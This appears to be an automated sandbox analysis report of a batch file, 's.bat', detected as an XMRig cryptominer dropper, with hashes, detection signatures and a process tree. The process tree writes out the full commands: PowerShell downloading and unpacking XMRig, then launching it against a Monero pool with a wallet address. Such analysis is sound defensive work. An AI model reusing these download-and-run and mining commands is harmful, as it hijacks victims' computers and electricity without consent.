Analysis
-
max time kernel
834s -
max time network
1192s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
21-12-2024 15:09
Behavioral task
behavioral1
Sample
s.bat
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral2
Sample
s.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
s.bat
Resource
win10ltsc2021-20241211-en
General
-
Target
s.bat
-
Size
1KB
-
MD5
ccc7afd46efac5aca2f96dc6c6d757b5
-
SHA1
981911ae2cf8c85fd9bbb70ea938105617c2aefd
-
SHA256
35347449c9856b13ee6f4131fc675270c55566881a19cc3d6bc5d2b0709412bb
-
SHA512
1d336a5827812cd871bdb1459536c5052e4cc50bde82d3e5fd7e474a1488bf55a0763f1d2cac7f6569a2ac6334f066a465cb7b74e52ddbb2d23bd2a31e7b3563
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
resource yara_rule behavioral3/files/0x002800000004610b-59.dat family_xmrig behavioral3/files/0x002800000004610b-59.dat xmrig -
Xmrig family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 4 4124 powershell.exe 10 4124 powershell.exe -
pid Process 4124 powershell.exe 3320 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 236 xmrig.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 4752 timeout.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4124 powershell.exe 4124 powershell.exe 3320 powershell.exe 3320 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4124 powershell.exe Token: SeDebugPrivilege 3320 powershell.exe Token: SeLockMemoryPrivilege 236 xmrig.exe Token: SeLockMemoryPrivilege 236 xmrig.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 236 xmrig.exe -
Suspicious use of WriteProcessMemory 24 IoCs
description pid Process procid_target PID 2592 wrote to memory of 4124 2592 cmd.exe 84 PID 2592 wrote to memory of 4124 2592 cmd.exe 84 PID 2592 wrote to memory of 4752 2592 cmd.exe 90 PID 2592 wrote to memory of 4752 2592 cmd.exe 90 PID 2592 wrote to memory of 3320 2592 cmd.exe 93 PID 2592 wrote to memory of 3320 2592 cmd.exe 93 PID 2592 wrote to memory of 4776 2592 cmd.exe 95 PID 2592 wrote to memory of 4776 2592 cmd.exe 95 PID 2592 wrote to memory of 2920 2592 cmd.exe 96 PID 2592 wrote to memory of 2920 2592 cmd.exe 96 PID 2592 wrote to memory of 2900 2592 cmd.exe 97 PID 2592 wrote to memory of 2900 2592 cmd.exe 97 PID 2592 wrote to memory of 5072 2592 cmd.exe 98 PID 2592 wrote to memory of 5072 2592 cmd.exe 98 PID 2592 wrote to memory of 1432 2592 cmd.exe 99 PID 2592 wrote to memory of 1432 2592 cmd.exe 99 PID 2592 wrote to memory of 4684 2592 cmd.exe 100 PID 2592 wrote to memory of 4684 2592 cmd.exe 100 PID 2592 wrote to memory of 4580 2592 cmd.exe 101 PID 2592 wrote to memory of 4580 2592 cmd.exe 101 PID 2592 wrote to memory of 2020 2592 cmd.exe 102 PID 2592 wrote to memory of 2020 2592 cmd.exe 102 PID 2592 wrote to memory of 236 2592 cmd.exe 103 PID 2592 wrote to memory of 236 2592 cmd.exe 103
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\s.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2592 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri https://github.com/xmrig/xmrig/releases/download/v6.22.2/xmrig-6.22.2-msvc-win64.zip -OutFile C:\Users\Admin\AppData\Local\Temp\xmrig-6.22.2-msvc-win64.zip"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4124
-
-
C:\Windows\system32\timeout.exetimeout /t 102⤵
- Delays execution with timeout.exe
PID:4752
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path C:\Users\Admin\AppData\Local\Temp\xmrig-6.22.2-msvc-win64.zip -DestinationPath C:\Users\Admin\AppData\Local\Temp\xmrig"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3320
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo 312⤵PID:4776
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo 122⤵PID:2920
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo 212⤵PID:2900
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo 352⤵PID:5072
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo 352⤵PID:1432
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo 42⤵PID:4684
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo 62⤵PID:4580
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo 02⤵PID:2020
-
-
C:\Users\Admin\AppData\Local\Temp\xmrig\xmrig-6.22.2\xmrig.exe"C:\Users\Admin\AppData\Local\Temp\xmrig\xmrig-6.22.2\xmrig.exe" --donate-level 1 -o de.monero.herominers.com:1111 -u solo:46snjQGRP7EaVq5ByVkqeeQhDoNXfpLgeVUfyafhuoan4SdE6Sn3BVs4C4hykg6y3yWK5w1prCjx84nYs7egieBuAEG2YUX -p p1_ -a rx/0 -k2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:236
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5ed30ca9187bf5593affb3dc9276309a6
SHA1c63757897a6c43a44102b221fe8dc36355e99359
SHA25681fc6cfe81caf86f84e1285cb854082ac5e127335b5946da154a73f7aa9c2122
SHA5121df4f44b207bb30fecee119a2f7f7ab7a0a0aed4d58eeabbec5791d5a6d9443cccffa5479ad4da094e6b88c871720d2e4bcf14ebec45a587ee4ec5e572f37810
-
Filesize
1KB
MD5670c4920a79e1c12a6c4e8ff4007562b
SHA15023e825d4a8af071498411f589f3b25ff335f0f
SHA25637c4a07c009ffa6061e7ffcec01d0eb2c1a2c7ac94fc3d2208e1bfee6815c92f
SHA512d717acfd4aea4d2788b06be081c00d97929eadaa97b9144ebc02617837d8c9ffaad30f3bef0a662c560dc2bc98603853af3404120f5ac2430335dda06e7c5bd5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.5MB
MD557b7ab5bce7d5e47fd168e1f0d437d32
SHA1050eeae3e0f0e876f9da175347b586871d14fe83
SHA2561d903d39c7e4e1706c32c44721d6a6c851aa8c4c10df1479478ee93cd67301bc
SHA5128cc6e3e0e78f706172a47bef261e1d73ce882ce531fe51177ba46cee659128e2115311d348ca07a717ff737e4bc802c7ca4cc57de716cbe55202b9482b5e2022
-
Filesize
6.1MB
MD5f6d520ae125f03056c4646c508218d16
SHA1f65e63d14dd57eadb262deaa2b1a8a965a2a962c
SHA256d2fcf28897ddc2137141d838b734664ff7592e03fcd467a433a51cb4976b4fb1
SHA512d1ec3da141ce504993a0cbf8ea4b719ffa40a2be4941c18ffc64ec3f71435f7bddadda6032ec0ae6cada66226ee39a2012079ed318df389c7c6584ad3e1c334d